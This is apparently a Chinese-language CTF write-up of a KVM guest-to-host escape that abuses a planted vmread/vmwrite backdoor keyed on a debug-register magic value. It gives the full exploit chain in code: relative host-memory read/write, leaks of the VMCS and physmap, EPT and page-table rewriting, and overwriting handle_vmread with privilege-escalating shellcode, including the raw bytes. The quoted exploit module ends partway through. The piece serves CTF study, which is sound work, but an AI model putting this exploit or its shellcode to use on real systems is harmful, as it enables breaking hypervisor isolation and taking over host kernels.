			copy_vmcs02_to_vmcs12_rare(vcpu, vmcs12);

		/* Read the field, zero-extended to a u64 value */
		value = vmcs12_read_any(vmcs12, field, offset);
	} else {
		/*
		 * Hyper-V TLFS (as of 6.0b) explicitly states, that while an
		 * enlightened VMCS is active VMREAD/VMWRITE instructions are
		 * unsupported. Unfortunately, certain versions of Windows 11
		 * don't comply with this requirement which is not enforced in
		 * genuine Hyper-V. Allow VMREAD from an enlightened VMCS as a
		 * workaround, as misbehaving guests will panic on VM-Fail.
		 * Note, enlightened VMCS is incompatible with shadow VMCS so
		 * all VMREADs from L2 should go to L1.
		 */
		if (WARN_ON_ONCE(is_guest_mode(vcpu)))
			return nested_vmx_failInvalid(vcpu);

		offset = evmcs_field_offset(field, NULL);
		if (offset < 0)
			return nested_vmx_fail(vcpu, VMXERR_UNSUPPORTED_VMCS_COMPONENT);

		/* Read the field, zero-extended to a u64 value */
		value = evmcs_read_any(nested_vmx_evmcs(vmx), field, offset);
	}

	/*
	 * Now copy part of this value to register or memory, as requested.
	 * Note that the number of bits actually copied is 32 or 64 depending
	 * on the guest's mode (32 or 64 bit), not on the given field's length.
	 */
	if (instr_info & BIT(10)) {
		kvm_register_write(vcpu, (((instr_info) >> 3) & 0xf), value);
	} else {
		len = is_64_bit_mode(vcpu) ? 8 : 4;
		if (get_vmx_mem_address(vcpu, exit_qualification,
					instr_info, true, len, &gva))
			return 1;
		/* _system ok, nested_vmx_check_permission has verified cpl=0 */
		r = kvm_write_guest_virt_system(vcpu, gva, &value, len, &e);
		if (r != X86EMUL_CONTINUE)
			return kvm_handle_memory_failure(vcpu, r, &e);
	}

	return nested_vmx_succeed(vcpu);
}

static int handle_vmwrite(struct kvm_vcpu *vcpu)
{
	struct vmcs12 *vmcs12 = is_guest_mode(vcpu) ? get_shadow_vmcs12(vcpu)
						    : get_vmcs12(vcpu);
	unsigned long exit_qualification = vmx_get_exit_qual(vcpu);
	u32 instr_info = vmcs_read32(VMX_INSTRUCTION_INFO);
	struct vcpu_vmx *vmx = to_vmx(vcpu);
	struct x86_exception e;
	unsigned long field;
	short offset;
	gva_t gva;
	int len, r;

	/*
	 * The value to write might be 32 or 64 bits, depending on L1's long
	 * mode, and eventually we need to write that into a field of several
	 * possible lengths. The code below first zero-extends the value to 64
	 * bit (value), and then copies only the appropriate number of
	 * bits into the vmcs12 field.
	 */
	u64 value = 0;

	if (!nested_vmx_check_permission(vcpu))
		return 1;

	/*
	 * In VMX non-root operation, when the VMCS-link pointer is INVALID_GPA,
	 * any VMWRITE sets the ALU flags for VMfailInvalid.
	 */
	if (vmx->nested.current_vmptr == INVALID_GPA ||
	    (is_guest_mode(vcpu) &&
	     get_vmcs12(vcpu)->vmcs_link_pointer == INVALID_GPA))
		return nested_vmx_failInvalid(vcpu);

	if (instr_info & BIT(10))
		value = kvm_register_read(vcpu, (((instr_info) >> 3) & 0xf));
	else {
		len = is_64_bit_mode(vcpu) ? 8 : 4;
		if (get_vmx_mem_address(vcpu, exit_qualification,
					instr_info, false, len, &gva))
			return 1;
		r = kvm_read_guest_virt(vcpu, gva, &value, len, &e);
		if (r != X86EMUL_CONTINUE)
			return kvm_handle_memory_failure(vcpu, r, &e);
	}

	field = kvm_register_read(vcpu, (((instr_info) >> 28) & 0xf));

	offset = get_vmcs12_field_offset(field);
	if (offset < 0)
		return nested_vmx_fail(vcpu, VMXERR_UNSUPPORTED_VMCS_COMPONENT);

	/*
	 * If the vCPU supports "VMWRITE to any supported field in the
	 * VMCS," then the "read-only" fields are actually read/write.
	 */
	if (vmcs_field_readonly(field) &&
	    !nested_cpu_has_vmwrite_any_field(vcpu))
		return nested_vmx_fail(vcpu, VMXERR_VMWRITE_READ_ONLY_VMCS_COMPONENT);

	/*
	 * Ensure vmcs12 is up-to-date before any VMWRITE that dirties
	 * vmcs12, else we may crush a field or consume a stale value.
	 */
	if (!is_guest_mode(vcpu) && !is_shadow_field_rw(field))
		copy_vmcs02_to_vmcs12_rare(vcpu, vmcs12);

	/*
	 * Some Intel CPUs intentionally drop the reserved bits of the AR byte
	 * fields on VMWRITE.  Emulate this behavior to ensure consistent KVM
	 * behavior regardless of the underlying hardware, e.g. if an AR_BYTE
	 * field is intercepted for VMWRITE but not VMREAD (in L1), then VMREAD
	 * from L1 will return a different value than VMREAD from L2 (L1 sees
	 * the stripped down value, L2 sees the full value as stored by KVM).
	 */
	if (field >= GUEST_ES_AR_BYTES && field <= GUEST_TR_AR_BYTES)
		value &= 0x1f0ff;

	vmcs12_write_any(vmcs12, field, offset, value);

	/*
	 * Do not track vmcs12 dirty-state if in guest-mode as we actually
	 * dirty shadow vmcs12 instead of vmcs12.  Fields that can be updated
	 * by L1 without a vmexit are always updated in the vmcs02, i.e. don't
	 * "dirty" vmcs12, all others go down the prepare_vmcs02() slow path.
	 */
	if (!is_guest_mode(vcpu) && !is_shadow_field_rw(field)) {
		/*
		 * L1 can read these fields without exiting, ensure the
		 * shadow VMCS is up-to-date.
		 */
		if (enable_shadow_vmcs && is_shadow_field_ro(field)) {
			preempt_disable();
			vmcs_load(vmx->vmcs01.shadow_vmcs);

			__vmcs_writel(field, value);

			vmcs_clear(vmx->vmcs01.shadow_vmcs);
			vmcs_load(vmx->loaded_vmcs->vmcs);
			preempt_enable();
		}
		vmx->nested.dirty_vmcs12 = true;
	}

	return nested_vmx_succeed(vcpu);
}

int kvm_set_dr(struct kvm_vcpu *vcpu, int dr, unsigned long val)
{
	size_t size = ARRAY_SIZE(vcpu->arch.db);

	switch (dr) {
	case 0 ... 3:
		vcpu->arch.db[array_index_nospec(dr, size)] = val;
		if (!(vcpu->guest_debug & KVM_GUESTDBG_USE_HW_BP))
			vcpu->arch.eff_db[dr] = val;
		break;
	case 4:
	case 6:
		if (!kvm_dr6_valid(val))
			return 1; /* #GP */
		vcpu->arch.dr6 = (val & DR6_VOLATILE) | kvm_dr6_fixed(vcpu);
		break;
	case 5:
	default: /* 7 */
		if (!kvm_dr7_valid(val))
			return 1; /* #GP */
		vcpu->arch.dr7 = (val & DR7_VOLATILE) | DR7_FIXED_1;
		kvm_update_dr7(vcpu);
		break;
	}

	return 0;
}
EXPORT_SYMBOL_GPL(kvm_set_dr);

unsigned long kvm_get_dr(struct kvm_vcpu *vcpu, int dr)
{
	size_t size = ARRAY_SIZE(vcpu->arch.db);

	switch (dr) {
	case 0 ... 3:
		return vcpu->arch.db[array_index_nospec(dr, size)];
	case 4:
	case 6:
		return vcpu->arch.dr6;
	case 5:
	default: /* 7 */
		return vcpu->arch.dr7;
	}
}

漏洞点

handle_vmwrite会从第struct kvm_vcpu的arch.db[0]对应的内容，如果是0x1337BABE，然后会取第struct kvm_vcpu的arch.db[1]对应的内容为dr，然后会取第struct kvm_vcpu的arch.db[2]对应的内容赋值给 struct vmcs12 +8dr对应的地址所在内容

*（struct vmcs12 *+8*struct kvm_vcpu的arch.db[0]）=struct kvm_vcpu的arch.db[2]
handle_vmread会从第struct kvm_vcpu的arch.db[0]对应的内容，如果是0x1337BABE，然后会取第struct kvm_vcpu的arch.db[1]对应的内容为dr，然后会将 struct vmcs12 +8dr对应的地址的内容赋值给struct kvm_vcpu的arch.db[2]

struct kvm_vcpu的arch.db[2]= *（struct vmcs12 *+8*struct kvm_vcpu的arch.db[0]）

可以相对struct vmcs12 *的任意地址读写，而且这个 vmcs12指向的是我们在虚拟机分配的vmcs在主机上的地址，为什么呢？因为这个地方是处理虚拟机执行vmx指令的，而vmread指令是从控制的虚拟机的vmcs里读取相关字段，而虚拟机执行vmread会陷入到主机的vmm中去，然后再去处理虚拟机的vmread，所以这里的vmcs自然也是虚拟机控制的虚拟机的VMCS了

这就相当于主机的任意地址读写了（但这里的struct kvm_vcpu *vcpu还是虚拟机的，不是虚拟机里的虚拟机的）

思路

vmx相关初始化

vmx指令相关使用

为了能够执行 vmread/vmwrite 指令，需要进行一些设置。vmread 和 vmwrite 指令用于与“虚拟机控制结构”(VMCS) 交互，在虚拟机机中执行就是和嵌套虚拟机的VMCS交互，所以首先虚拟机要开启VMX模式（嵌套虚拟机化），这样才能嵌套虚拟化，所以没有嵌套虚拟机的VMCS，自然vmread指令和vmwrite无法使用

首先是分配并初始化VMXON Region和嵌套虚拟机实例对应的VMCS Region

	vmxon_page = kmalloc(4096, GFP_KERNEL);
    memset(vmxon_page, 0, 4096);
    vmcs_page = kmalloc(4096, GFP_KERNEL);   
    memset(vmcs_page, 0, 4096);
    vmxon_page_pa = virt_to_phys(vmxon_page);
    vmcs_page_pa = virt_to_phys(vmcs_page);
    printk("vmxon_page %p --- vmxon_page_pa %p",vmxon_page,vmxon_page_pa);
    printk("vmcs_page %p --- vmcs_page_pa %p",vmcs_page,vmcs_page_pa);

然后是设置vmxon_page 和vmcs_page的开头信息，读MSR寄存器的指令是rdmsr，这条指令使用eax，edx，ecx作为参数，ecx用于保存MSR寄存器相关值的索引，而edx，eax分别保存结果的高32位和低32位。该指令必须在ring0权限或者实地址模式下执行；否则会触发#GP(0)异常。在ecx中指定一个保留的或者未实现的MSR地址也会引发异常。这里根据索引读到vmcs_revision的值，然后保存到vmxon_page和vmcs_page的开头

    uint32_t a, d;
    asm volatile ("rdmsr" : "=a"(a), "=d"(d) : "c"(MSR_IA32_VMX_BASIC) : "memory");
    uint64_t vmcs_revision=a | ((uint64_t) d << 32);
    printk("vmcs_revision %p",vmcs_revision);
    *(uint64_t *)(vmxon_page) = vmcs_revision;
    *(uint64_t *)(vmcs_page) = vmcs_revision;

然后是启动vmx模式，通过从虚拟机的 CR4中取出第13位放入rax中并将该位设为1，再更新回cr4，这一步的目的是打开CR4寄存器中的虚拟化开关

    asm volatile (
    "movq %cr4, %rax\n\t"
    "bts $13, %rax\n\t"
    "movq %rax, %cr4"
);

注意： VMXON、VMCLEAR 和 VMPTRLD 指令必须指向各自区域的物理地址。

vmxon指令通过传入分配的VMXON Region的物理地址作为操作数，表示进入VMX操作模式，setna指令借助EFLAGS.CF的值判断执行是否成功：

setna 表示 “set if not above”，它会根据 vmxon 指令的结果设置一个字节。如果vmxon指令成功将返回0


  asm volatile (
    "vmxon %[pa]\n\t"
    "setna %[ret]"
    : [ret] "=rm" (vmxonret)
    : [pa] "m" (vmxon_page_pa)
    : "cc", "memory"
    );
    printk("vmxonret %p",vmxonret);

这里可以留意一下，VMX的虚拟化开启需要打开两个“开关”，一个是Host CR4寄存器的第13位，一个是vmxon指令

顺便补充一点关于GCC内联汇编的概念：在clobbered list（第三行冒号）中加入cc和memory会告诉编译器内联汇编会修改cc（状态寄存器标志位）和memory（内存）中的值，于是编译器不会再假设这段内联汇编后对应的值依然是合法的

vmptrld 加载一个VMCS结构体指针作为当前操作对象:


   asm volatile (
    "vmptrld %[pa]\n\t"
    "setna %[ret]"
    : [ret] "=rm" (vmptrldret)
    : [pa] "m" (vmcs_page_pa)
    : "cc", "memory"
);

VMCS被加载到逻辑CPU上后，处理器并没法通过普通的内存访问指令去访问它，如果那样做的话，会引起“处理器报错”，唯一可用的方法就是通过vmread和vmwrite指令去访问。

相对地址任意读写

任意读通过设置db0和db1，然后读出的内容在db2

static size_t read_relative(size_t offset_to_nest_vmcs)
{
    size_t value;
    size_t vmcs_field_value=0;
    size_t vmcs_field=0;
    size_t magic=0x1337BABE;
    asm("movq %0, %%db0"    ::"r" (magic));
    asm("movq %0, %%db1"    ::"r" (offset_to_nest_vmcs));
    asm volatile (
    "vmread %1, %0\n\t"  
    : "=r" (vmcs_field_value)
    : "r" (vmcs_field)
);
    asm("movq %%db2, %0" :"=r" (value));
    return value;

}

任意写通过设置db0和db1和db2，将db2写到目的位置

static void write_relative(size_t offset_to_nest_vmcs,size_t value)
{
    size_t vmcs_field_value=0;
    size_t vmcs_field=0;
    size_t magic=0x1337BABE;
    asm("movq %0, %%db0"    ::"r" (magic));
    asm("movq %0, %%db1"    ::"r" (offset_to_nest_vmcs));
    asm("movq %0, %%db2"    ::"r" (value));
    asm volatile (
    "vmwrite %1, %0\n\t"  
    : "=r" (vmcs_field_value)
    : "r" (vmcs_field)
);
    asm("movq %%db2, %0" :"=r" (value));

}

寻找虚拟机的VMCS的偏移

由于我们是相对嵌套虚拟机的VMCS在宿主机上的虚拟地址的相对任意地址读和写，而VMCS都是kmalloc分配的，然后内核堆在直接映射区上，所以通过上下相对地址扫描去根据VMCS相关特征去找虚拟机的VMCS在宿主机上的虚拟地址

根据vmcs结构体的特征，我们选择其字段guest_idtr_base 。这个值不会变化，并且VMCS 需要页面对齐，因此只需要在页面粒度的偏移 0x208 处查找 IDT 基地址0xfffffe0000000000（guest_idtr_base ）就可以找到虚拟机的VMCS的虚拟地址

我们可以看看偏移为0时候vmcs的内容，就是vmcs_revision的字段内容
在这里插入图片描述

 for (i = 0; i < 0x4000; i++) {
        pos_offset = ((i * 0x1000) + 0x208) / 8;
        neg_offset = ((i * -1 * 0x1000) + 0x208) / 8;

        pos_val = read_relative(pos_offset);
        if (pos_val == 0xfffffe0000000000) {
            found_val = pos_val;
            found_offset = pos_offset;
            break;
        }

        neg_val = read_relative(neg_offset);
        if (neg_val == 0xfffffe0000000000) {
            found_val = neg_val;
            found_offset = neg_offset;
            break;
        }
    }
    pr_info("vmcs12[%llx * 8] = %llx\n", pos_offset, pos_val);
    pr_info("vmcs12[%llx * 8] = %llx\n", neg_offset, neg_val);

寻找nest_vmx进而泄露嵌套虚拟机的在宿主机上的虚拟地址

nested_vmx结构包含一个指向嵌套虚拟机VMCS的指针： cached_vmcs12 。它还包含一些我们知道其值的字段： vmxon_ptr和current_vmptr ，它们是我们创建的 VMXON 区域和 VMCS 的在虚拟机上的物理地址。所以我们可以扫描内存找到对应偏移位置为 VMXON 区域和 VMCS 的在虚拟机上的物理地址（这个我们是知道的），然后就可以知道nested_vmx 的偏移，进而知道cached_vmcs12的偏移，然后根据偏移读出嵌套虚拟机VMCS的虚拟地址，

struct nested_vmx {
    /* Has the level1 guest done vmxon? */
    bool vmxon;
    gpa_t vmxon_ptr;
    bool pml_full;

    /* The guest-physical address of the current VMCS L1 keeps for L2 */
    gpa_t current_vmptr;
    /*
     * Cache of the guest's VMCS, existing outside of guest memory.
     * Loaded from guest memory during VMPTRLD. Flushed to guest
     * memory during VMCLEAR and VMPTRLD.
     */
    struct vmcs12 *cached_vmcs12;
    ...
}

 for (i = 1; i < (0x4000*0x200); i += 2) {
        pos_offset = i;
        neg_offset = -i;
        
        if ( read_relative(pos_offset)== vmcs_page_pa && read_relative(pos_offset-2) == vmxon_page_pa) {
            found_val = pos_val;
            found_offset = pos_offset;
            break;
        }

    }
l2_vmcs_addr = read_guy(nested_vmx_offset+1);

得到phymap基地址

非常感谢nightu和Eurus和flyyy和tplus各位师傅的帮助

 /**
     * KASLR's granularity is 256MB, and pages of size 0x1000000 is 1GB MEM,
     * so we can simply get the vmemmap_base like this in a SMALL-MEM env.
     * For MEM > 1GB, we can just find the secondary_startup_64 func ptr,
     * which is located on physmem_base + 0x9d000, i.e., vmemmap_base[156] page.
     * If the func ptr is not there, just vmemmap_base -= 256MB and do it again.
     */
    vmemmap_base = (size_t) info_pipe_buf.page & 0xfffffffff0000000;
    for (;;) {
        arbitrary_read_by_pipe((struct page*) (vmemmap_base + 157 * 0x40), buf);

        if (buf[0] > 0xffffffff81000000 && ((buf[0] & 0xfff) == 0x070)) {
            kernel_base = buf[0] -  0x070;
            kernel_offset = kernel_base - 0xffffffff81000000;
            printf("\033[32m\033[1m[+] Found kernel base: \033[0m0x%lx\n"
                   "\033[32m\033[1m[+] Kernel offset: \033[0m0x%lx\n", 
                   kernel_base, kernel_offset);
            break;
        }

        vmemmap_base -= 0x10000000;
    }
    printf("\033[32m\033[1m[+] vmemmap_base:\033[0m 0x%lx\n\n", vmemmap_base);

通过嵌套虚拟机VMCS的虚拟地址得到主机的physmap 基址，这里可以先试试掩码（偏移只能是256MB的倍数），但如果此时object地址偏移超过0x10000000的话就需要采用上述遍历的方法，这里侥幸掩码就能成功

   physbase = l2_vmcs_addr & ~0xfffffffull;

获得ept

然后通过虚拟机的VMCS的偏移量（之前得到位置偏移量了）进而得到其中EPTP（以主机的物理地址形式存在）

 eptp_value = read_relative(l1_vmcs_offset-50);

EPTP是第四级页表的在主机上的物理地址，然后和physbase得到虚拟地址，再和之前的嵌套虚拟机的VMCS的在主机的虚拟地址（也就是一开始的相对任意地址读写的起始那玩意，但后来被泄露出了在主机上的虚拟地址）相减得到偏移，再通过偏移得到EPT表的第一个表项。

eptp_value = read_relative(l1_vmcs_offset-50);
ept_addr = physbase + (eptp_value & ~0xfffull);
ept_offset = (ept_addr-l2_vmcs_addr) / 8;
third_value = read_relative(ept_offset);

改虚拟机的的EPT

https://www.owalle.com/2018/12/10/kvm-memory/

在这里插入图片描述

EPT表和相关页表项都是主机的物理地址

读出第四级页表的第一个entry后，即第三级页表在主机的物理地址，然后依然是得到在主机上的虚拟地址，然后得到偏移往第三级页表写一个页表项，此时大项可以代表一个1GB，2的九次方2的九次方2的十二次方=1GB

third_addr = physbase + (third_value & ~0xfffull);
    pr_info("[exp]: pml4e_addr: %llx\n", pml4e_addr);

    third_offset = (third_addr-l2_vmcs_addr) / 8;
    pr_info("[exp]: pml4e_offset: %llx\n", pml4e_offset);

    write_relative(third_offset + 6, 0x87);

此时0x87代表该页表项是个大页，此时 1GB Page Physical Addr是0

此时为了不打乱已有的页表项，这里添加一个，此时是第6个entry，所以对应6GB-7GB，最终虚拟机里的物理地址6GB-7GB映射到主机的物理地址是0GB-1GB

改虚拟机的cr3

在这里插入图片描述


+-------------------+
|     CR3 Register  |
+-------------------+
         |
         v
+-------------------+
|   Physical Memory |
|                   |
| +---------------+ |
| |     PGD       | |
| | [0]           | |
| | ...           | |
| | [272]         | |
| | ...           | |
| +---------------+ |
|                   |
+-------------------+

After:
+-------------------+
|     CR3 Register  |
+-------------------+
         |
         v
+-------------------+
|   Physical Memory |
|                   |
| +---------------+ |
| |     PGD       | |
| | [0]           | |
| | ...           | |
| | [272] --------+---> +---------------+
| | ...           | |   | New PGDE Page |
| +---------------+ |   | [0] -------+  |
|                   |   | ...        |  |
|                   |   +------------+  |
|                   |                |  
|                   |                v  
|                   |        +----------------+
|                   |        | 1GB Huge Page  |
|                   |        | at 0x180000000 |
|                   |        | (6GB physical) |
|                   |        +----------------+
+-------------------+

虚拟机的CR3存的是虚拟机的页表的物理地址（完成GVA->GPA的），修改里面的页表项目肯定不能直接通过物理地址修改，得通过虚拟机的直接映射区来修改，虚拟机的直接映射区起始地址就是page_offset_base这个变量可以知道，里面的页表项也要是虚拟机的物理地址形式

这里也是向第四级页表的第272个写入一个entry，然后第三级页表的第一个entry为0x180000000 | (1<<7) | 0x3使得虚拟机的虚拟地址0xffff880000000000+0GB-0xffff880000000000+1GB映射到虚拟机的物理地址6GB-7GB

因为第三级页表的第272个对应到高39位到高48位即100010000对应0x88和一个二进制位0，然后这里前面的位会和这里的最高位保持一致

  	cr3 = read_cr3();
    four= (cr3 & ~0xfffull) + page_offset_base;
	
    third_page= kzalloc(0x1000, GFP_KERNEL);
    third= virt_to_phys(third_page);

    four[272] = third| 0x7;
    
    third[0] =  0x180000000 | 0x87;

寻找覆盖函数

最终虚拟机中0xffff880000000000+0GB-0xffff880000000000+1GB是映射到主机物理内存0-1G，很显然1G远远大于主机内存了（qemu模拟设置的内存只有几百M），所以此时我们虚拟机中从0xffff880000000000开始遍历，相当于从物理地址0开始遍历，自然可以遍历到想要覆盖的函数,然后覆盖为shellcode

这里选择和函数保持在一个页里的特殊字节码就行了

原函数
在这里插入图片描述
通过十六进制编辑器去找，这里我选择的是0x00001C70BF440F4C，因为这里除了60开始的位置就只有这里了，而我们查看的偏移是0x503

 for (i = 0; i < (1<<18); i += 0x1000) {
        unsigned long long val = *((unsigned long long *)(0xffff880000000503 + i));

        // check the value and check if relocations were applied
        if (val == 0x1C70BF440F4C  ) {
            handle_vmread_page = 0xffff880000000000 + i;
            break;
        }
    }
    handle_vmread = handle_vmread_page + 0x4d0;

shellcode

CPU Entry Area Mapping:
这是内核内存中的一个特殊区域，用于存储一些重要的CPU相关数据结构和入口点。这个区域的地址通常是固定的，不受KASLR（内核地址空间布局随机化）的影响。
在这个区域的起始点有几个地址，它们与内核text段（代码段）保持固定的偏移关系。这意味着，如果你知道这些地址的值，你就可以计算出内核代码的实际加载地址。
由于CPU Entry Area Mapping的地址是固定的，攻击者可以直接读取0xfffffe0000000004这个地址的内容。然后，通过一些简单的计算（可能是加上或减去一个固定的偏移量），得到基地址

在这里插入图片描述


/*
    push rax
    push rbx
    push rcx
    push rdx
    push r9
    push r10
    push r11
    push r12
    push r13
    push r14
    push rdi
    push rsi

    // get kaslr base
    mov rax, 0xfffffe0000000004
    mov rax, [rax]
    sub rax, 0x1008e00

    // r12 is kaslr_base
    mov r12, rax

    // commit_creds
    mov r13, r12
    add r13, 0xbdad0

    // init_cred
    mov r14, r12
    add r14, 0x1a52ca0

    mov rdi, r14
    call r13

    // filp_open
    mov r11, r12
    add r11, 0x292420

    // push /root/flag.txt
    mov rax, 0x7478742e6761
    push rax
    mov rax, 0x6c662f746f6f722f
    push rax
    mov rdi, rsp

    // O_RDONLY
    mov rsi, 0

    call r11

    // r10 is filp_ptr
    mov r10, rax

    // kernel_read
    mov r11, r12
    add r11, 0x294c70

    // writeable kernel address
    mov r9, r12
    add r9, 0x18ab000

    mov rdi, r10
    mov rsi, r9
    mov rdx, 0x100
    mov rcx, 0

    call r11

    pop rax
    pop rax

    pop rsi
    pop rdi
    pop r13
    pop r14
    pop r12
    pop r11
    pop r10
    pop r9
    pop rdx
    pop rcx
    pop rbx
    pop rax
*/

当然不能直接生猛的覆盖，不然可能出现故障无法返回到虚拟机，所以这里提前先将成功返回的必经的范围都覆盖为nop，保存寄存器同时最后还原寄存器，最后覆盖最后为ret（这里可以结合调试试试覆盖后哪些指令返回后能正常返回虚拟机）

memset(handle_vmread, 0x90, 0x281);
    handle_vmread[0x286] = 0xc3;

    memcpy(handle_vmread, shellcode, sizeof(shellcode)-1);

    read_realative(0);

    // scan for flag in memory
    for (i = 0; i < 1<<18; i+= 0x1000) {
        if (!memcmp(0xffff880000000000 + i, "corctf{", 7)) {
            pr_info("flag: %s\n", 0xffff880000000000 + i);
            break;
        }
    }

在这里插入图片描述

exp

由于本人复现的exp有些过于丑陋，为了读者能够更好的参考到，这里还是附上我参考的Shellphish的wp

#include <linux/init.h>
#include <linux/slab.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/proc_fs.h>
#include <linux/sched.h>
#include <linux/kprobes.h>
#include <linux/version.h>
#include <linux/efi.h>

#include <asm/uaccess.h>
#include <asm/fsgsbase.h>
#include <asm/io.h>
#include <linux/uaccess.h>

static ssize_t proc_read(struct file* filep, char* __user buffer, size_t len, loff_t* offset);
static ssize_t proc_write(struct file* filep, const char* __user u_buffer, size_t len, loff_t* offset);
static int proc_open(struct inode *inode, struct file *filep);


#if LINUX_VERSION_CODE >= KERNEL_VERSION(5,5,0)

static struct proc_ops fops = {
    .proc_open = proc_open,
    .proc_read = proc_read,
    .proc_write = proc_write,
};

#else

static struct file_operations fops = {
    .owner = THIS_MODULE,
    .open = proc_open,
    .read = proc_read,
    .write = proc_write,
};

#endif

const char kvm_dat[] = "\x0f\x78\xc6\x3e";

/*
    push rax
    push rbx
    push rcx
    push rdx
    push r9
    push r10
    push r11
    push r12
    push r13
    push r14
    push rdi
    push rsi

    // get kaslr base
    mov rax, 0xfffffe0000000004
    mov rax, [rax]
    sub rax, 0x1008e00

    // r12 is kaslr_base
    mov r12, rax

    // commit_creds
    mov r13, r12
    add r13, 0xbdad0

    // init_cred
    mov r14, r12
    add r14, 0x1a52ca0

    mov rdi, r14
    call r13

    // filp_open
    mov r11, r12
    add r11, 0x292420

    // push /root/flag.txt
    mov rax, 0x7478742e6761
    push rax
    mov rax, 0x6c662f746f6f722f
    push rax
    mov rdi, rsp

    // O_RDONLY
    mov rsi, 0

    call r11

    // r10 is filp_ptr
    mov r10, rax

    // kernel_read
    mov r11, r12
    add r11, 0x294c70

    // writeable kernel address
    mov r9, r12
    add r9, 0x18ab000

    mov rdi, r10
    mov rsi, r9
    mov rdx, 0x100
    mov rcx, 0

    call r11

    pop rax
    pop rax

    pop rsi
    pop rdi
    pop r13
    pop r14
    pop r12
    pop r11
    pop r10
    pop r9
    pop rdx
    pop rcx
    pop rbx
    pop rax
*/

const uint8_t shellcode[] = "\x50\x53\x51\x52\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x57\x56\x48\xb8\x04\x00\x00\x00\x00\xfe\xff\xff\x48\x8b\x00\x48\x2d\x00\x8e\x00\x01\x49\x89\xc4\x4d\x89\xe5\x49\x81\xc5\xd0\xda\x0b\x00\x4d\x89\xe6\x49\x81\xc6\xa0\x2c\xa5\x01\x4c\x89\xf7\x41\xff\xd5\x4d\x89\xe3\x49\x81\xc3\x20\x24\x29\x00\x48\xb8\x61\x67\x2e\x74\x78\x74\x00\x00\x50\x48\xb8\x2f\x72\x6f\x6f\x74\x2f\x66\x6c\x50\x48\x89\xe7\x48\xc7\xc6\x00\x00\x00\x00\x41\xff\xd3\x49\x89\xc2\x4d\x89\xe3\x49\x81\xc3\x70\x4c\x29\x00\x4d\x89\xe1\x49\x81\xc1\x00\xb0\x8a\x01\x4c\x89\xd7\x4c\x89\xce\x48\xc7\xc2\x00\x01\x00\x00\x48\xc7\xc1\x00\x00\x00\x00\x41\xff\xd3\x58\x58\x5e\x5f\x41\x5d\x41\x5e\x41\x5c\x41\x5b\x41\x5a\x41\x59\x5a\x59\x5b\x58";

uint64_t vmxon_page_pa, vmptrld_page_pa;

static __always_inline unsigned long long native_get_debugreg(int regno)
{
    unsigned long val = 0;    /* Damn you, gcc! */

    switch (regno) {
    case 0:
        asm("mov %%db0, %0" :"=r" (val));
        break;
    case 1:
        asm("mov %%db1, %0" :"=r" (val));
        break;
    case 2:
        asm("mov %%db2, %0" :"=r" (val));
        break;
    case 3:
        asm("mov %%db3, %0" :"=r" (val));
        break;
    case 6:
        asm("mov %%db6, %0" :"=r" (val));
        break;
    case 7:
        asm("mov %%db7, %0" :"=r" (val));
        break;
    default:
        BUG();
    }
    return val;
}

static __always_inline void native_set_debugreg(int regno, unsigned long value)
{
    switch (regno) {
    case 0:
        asm("mov %0, %%db0"    ::"r" (value));
        break;
    case 1:
        asm("mov %0, %%db1"    ::"r" (value));
        break;
    case 2:
        asm("mov %0, %%db2"    ::"r" (value));
        break;
    case 3:
        asm("mov %0, %%db3"    ::"r" (value));
        break;
    case 6:
        asm("mov %0, %%db6"    ::"r" (value));
        break;
    case 7:
        asm("mov %0, %%db7"    ::"r" (value));
        break;
    default:
        BUG();
    }
}

static noinline uint64_t read_cr3(void) {
    uint64_t val = 0;
        asm("mov %%cr3, %0" :"=r" (val));
    return val;
}

static noinline uint64_t read_guy(unsigned long offset) {
    uint64_t val = 0;

    uint64_t vmread_field = 0;
    uint64_t vmread_value = 0;

    native_set_debugreg(0, 0x1337babe);
    native_set_debugreg(1, offset);
    asm volatile( "vmread %[field], %[output]\n\t"
              : [output] "=r" (vmread_value)
              : [field] "r" (vmread_field) : );
    val = native_get_debugreg(2);

    return val;
}

static noinline void write_guy(unsigned long offset, unsigned long value) {
    uint64_t vmwrite_field = 0;
    uint64_t vmwrite_value = 0;

    native_set_debugreg(0, 0x1337babe);
    native_set_debugreg(1, offset);
    native_set_debugreg(2, value);
    asm volatile( "vmwrite %[value], %[field]\n\t"
          :
          : [field] "r" (vmwrite_field),
            [value] "r" (vmwrite_value) : );
}

#define IDT_BASE 0xfffffe0000000000ull

static noinline int find_l1_vmcs(uint64_t *l1_vmcs_offset) {
    unsigned long long pos_offset = 0, neg_offset = 0;
    uint64_t zero_val = 0, pos_val = 0, neg_val = 0;
    uint64_t found_val = 0, found_offset = 0;
    uint64_t i = 0;

    zero_val = read_guy(0ull);
    pr_info("vmcs12[0] = %llx\n", zero_val);

    // scan in each direction looking for the guest_idtr_base field of the l1 vm
    for (i = 0; i < 0x4000; i++) {
        // from attaching to the l1 guest, the address of guest_idtr_base always has 0x208 in the lower 3 nibbles
        pos_offset = ((i * 0x1000) + 0x208) / 8;
        neg_offset = ((i * -1 * 0x1000) + 0x208) / 8;

        pos_val = read_guy(pos_offset);
        if (pos_val == IDT_BASE) {
            found_val = pos_val;
            found_offset = pos_offset;
            break;
        }

        neg_val = read_guy(neg_offset);
        if (neg_val == IDT_BASE) {
            found_val = neg_val;
            found_offset = neg_offset;
            break;
        }

        if (i < 0x20) {
            pr_info("vmcs12[%llx * 8] = %llx\n", pos_offset, pos_val);
            pr_info("vmcs12[%llx * 8] = %llx\n", neg_offset, neg_val);
        }
    }
    if (found_val == 0) {
        pr_info("[exp]: IDT NOT FOUND :(\n");
        *l1_vmcs_offset = 0;
        return 0;
    } else {
        pr_info("[exp]: Found IDT in l1 at offset %lld; value: %llx\n", found_offset, found_val);
        *l1_vmcs_offset = found_offset;
        return 1;
    }
}

static noinline int find_nested_vmx(uint64_t *nested_vmx_offset) {
    // the nested_vmx struct contains two known values --
    //     the guest phys addrs of the vmxon_ptr and current_vmptr
    // finding this structure allows us to read the `cached_vmcs12` pointer
    // which is the host virtual address of our vmcs, based on that we can
    // figure out where we are at in the l1's virtual address space

    unsigned long long pos_offset = 0, neg_offset = 0;
    uint64_t zero_val = 0, pos_val = 0, neg_val = 0;
    uint64_t found_val = 0, found_offset = 0;
    uint64_t i = 0;

    zero_val = read_guy(0ull);
    pr_info("vmcs12[0] = %llx\n", zero_val);
    zero_val = read_guy(1ull);
    pr_info("vmcs12[1] = %llx\n", zero_val);
    zero_val = read_guy(0ull);
